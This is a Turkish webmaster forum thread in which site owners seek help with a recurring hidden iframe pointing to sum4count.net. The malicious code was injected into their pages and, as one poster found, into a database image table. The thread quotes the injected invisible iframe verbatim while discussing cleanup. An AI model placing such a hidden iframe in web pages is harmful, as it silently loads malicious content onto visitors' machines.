İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Sum4count.net iframe

pembekedi

0
İyinet Üyesi
Reaction score
1
Serverda pek çok site barındırıyorum ve günde pek çok kez upload yapıyorum. Sorunu yaşayan sitemde kodun eklendiği dosyaların izni 644. Aşağıdaki kod sürekli bu sayfalara eklenip duruyor silsem de nafile yeniden ekleniyor.

<iframe src='http://sum4count.net/strong/190/' style="display:none"></iframe>

Yaptığım araştırmada bunun Joomlada da başa geldiği yazılmış fakat benim sitem Joomla değil normal php dosyalarının olduğu bir site.

Kendi bilgisayarımda Adaware ile tarama yaptırdım bir tane melware buldum sildim.

İşin içinden çıkamadım sıyırmak üzereyim..

OsmanAtabey

0
İyinet Üyesi
Reaction score
4
Bilgisayarında iframe bulaştıran bir virüs olma ihtimali olabilir. Verdiğin iframe kodu başka bir site üzerindede gözüküyor.Google üzerinde aynı sorunu yaşayan kişiler bu virüs ftp şifrelerini otomatik olarak alır ve kullanır demişler.

- Antivirüs yazılımı kullanmayı deneyebilirsin.(Öneri kaspersky) + virüs taraması yaptıktan sonra ftp şifrelerini değiştir
- Bilgisayarına format atabilirsen at.Eğer format atamıyorsan ve virüs taraması yaptıktan sonra herhangi birşey bulamadıysan Vmware yazılımını kur üzerine sıfırdan bir windows kurduktan sonra ftp şifrelerini tekrar değiştir.
- Eğer sorun ftp şifrelerinde veya bilgisayarında değilse problemin sunucu tabanlı olabilir.

OsmanAtabey

0
İyinet Üyesi
Reaction score
4
FTP programı olarak ne kullandığını bilmiyorum fakat eğer özellikle cuteftp programını kullanıyorsan yukardaki yazdıklarımdan önce başka bir ftp programı bulup indir.Şifrelerini değiştir ve ftp ye yeni programla bağlan.

pembekedi

0
İyinet Üyesi
Reaction score
1
Ftp ile veya başka birşeyle alakası yoktu. Ftp programıyla yeniden ve binlerce kez aynı dosyaları tekrar gönderirken gördüğüm gibi dosyaların değiştirilme tarihi farklı olmuyordu. Bu virus müdür trojen midir artık ne ise resimleri sevdiği hakkında rivayetler vardı. Yani başına böyle bir sorun gelen olursa images klasörüne baksın önce orada bir php dosyası veya farklı bir dosya var mı diye.

Benim de sürekli resim yüklenen kısımda karşma çıkıyordu bu kod. Sonra veritabanını kontrol ettim ve resimlerin olduğu tabloda bazı resim kodlarının hemen bitişiğine bu kodun da eklenmiş olduğunu gördüm. Onları silip temizledim, tablo adını değiştirdim, şifreleri değiştirdim ve sorun şimdilik kayboldu. Ama bunu nasıl yapmışlar? O tabloya bazı resimlerin yanına o kodu nasıl eklemişler bunu da bulmak lazım tabi ki yine aynı şeyin olmaması için.

mwt

0
İyinet Üyesi
Reaction score
1
arkadaşlar aynı sorunu bende yaşıyorum be ttasarım yaptıgım internet sitelerine bulaşmış durumda

bu konuda yardımcı olacak çözüm bulabilecek bir arkadaş arıyoruz.

çözümünü bilen var ise lütfen yazınız.

hayırlı işler . iyi forumlar

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5